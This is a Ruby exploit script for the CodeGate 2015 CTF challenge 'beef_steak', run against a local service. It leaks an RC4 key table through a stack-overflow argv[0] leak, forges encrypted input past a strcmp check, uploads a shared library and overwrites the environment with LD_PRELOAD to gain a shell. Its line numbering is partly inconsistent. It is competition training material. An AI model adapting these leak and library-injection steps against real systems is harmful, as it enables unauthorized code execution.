CodeGate2015 beef_steak

  1. # coding: ascii-8bit
  2. require 'ctf.rb'
  3. require 'hexdump'
  4.  
  5. # Keyword
  6. # ・StackBOF => argv[0] leak
  7. # ・Share Library Injection
  8. # ・RC4
  9.  
  10. Host = "localhost"
  11. Port = 8887
  12.  
# Leak a slice of the RC4 S table from the service through its argv[0] leak.
#
# Sends 0x118 NUL bytes followed by the packed address 0x602160 + offset and
# returns the bytes echoed back between "detected ***: " and " terminated".
# The NUL padding is deliberate: per the original author's note, strlen()
# returns 0 for it, so the padding is not run through the cipher.
#
# @param offset [Integer] byte offset into the table; a non-zero offset
#   resumes the leak past a NUL byte that truncated the previous one
# @return [String] the leaked bytes
def get_stable(offset = 0)
  puts "[+] RC4 S table leak by argv[0] leak".colorize(:red)
  Cpwn.open(Host, Port) do |conn|
    leak_addr = 0x602160 + offset
    conn.send("\x00" * 0x118 + p64(leak_addr) + "\n")
    conn.recv_until("detected ***: ")
    leaked = conn.recv_until(" terminated")
    return leaked.gsub(" terminated", "")
  end
end
  24.  
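# RC4 pseudo-random generation algorithm (PRGA), written out step by step.
#
# @param size [Integer] number of keystream bytes to generate
# @param stable_origin [Array<Integer>] the 256-entry S table after key
#   scheduling (values 0..255); it is copied first, so the caller's table is
#   left untouched and can be reused for further calls
# @return [String] `size` keystream bytes (ASCII-8BIT)
def rc4_prga(size, stable_origin)
  # The table holds only Integers, so a shallow copy fully protects the
  # caller's table; the Marshal dump/load round-trip is not needed for that.
  stable = stable_origin.dup
  i = 0
  j = 0
  keystream = size.times.map do
    i = (i + 1) % 256
    j = (j + stable[i]) % 256
    stable[i], stable[j] = stable[j], stable[i]
    stable[(stable[i] + stable[j]) % 256]
  end
  keystream.pack("C*")
end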
  38.  
# XOR a message with an RC4 keystream generated from the given S table.
#
# Encrypting and decrypting are the same XOR operation, so this serves for
# both directions.
#
# @param s1 [String] input bytes (the script runs in ASCII-8BIT, so each
#   character is one byte)
# @param stable [Array<Integer>] the 256-entry S table handed to rc4_prga
# @return [String] `s1` XORed byte-wise with `s1.length` keystream bytes
def rc4(s1, stable)
  keystream = rc4_prga(s1.length, stable).bytes
  s1.each_char.with_index.map { |ch, idx| ch.ord ^ keystream[idx] }.pack("C*")
end
  47.  
  48.  
# The argv[0] leak stops at the first "\x00", so after appending a "\x00" the
# leak is repeated from the address advanced by the length gathered so far.
stable = get_stable(0) + "\x00"
stable << get_stable(stable.length)
Hexdump.dump(stable)
# Work on the table as Integers from here on.
stable = stable.chars.map(&:ord)
  56.  
  57.  
  58. Cipher = p64(0xf39fbfbd85aa3162, 0xe4ab23ac750c028a, 0x61c9bdef7a25c582)
  59.  
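Cpwn.open(Host, Port) do |c|

  # 0x400c5b <main+318>: call   0x400840 <strcmp@plt>
  # arg[0]: 0x602120 --> output
  # arg[1]: 0x400da6 --> 0xf39fbfbd85aa3162
  # 0x400da6:       0xf39fbfbd85aa3162      0xe4ab23ac750c028
  # 0x400db6:       0x61c9bdef7a25c582

  # Send rc4(Cipher): RC4 with the same table is its own inverse, so the
  # service's own RC4 pass presumably reproduces Cipher for the strcmp above
  # (confirm against the binary).
  c.send(rc4(Cipher, stable) + "\n")
  puts c.recv_until("message")
  # Upload the shared library. Read it directly rather than shelling out to
  # `cat`: a missing file now raises instead of silently sending an empty
  # payload.
  c.send(File.binread("mylib.so"))
end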
  73.  
  74.  
Cpwn.open(Host, Port) do |c|

  # c.debug = true
  # envp[0] : 0x128

  # Make the running program see LD_PRELOAD=./message in its environment.
  env_plain = "#{Cipher}\0\0LD_PRELOAD=./message\0"
  frame = rc4(env_plain, stable) << "\0"
  # Pad with spaces up to the envp[0] offset, then append the packed words.
  frame << " " * (0x128 - frame.length)
  frame << p64(0x60213a, 0x0) << "\n"

  c.send(frame)
  puts c.recv_until("message")
  c.hacked
end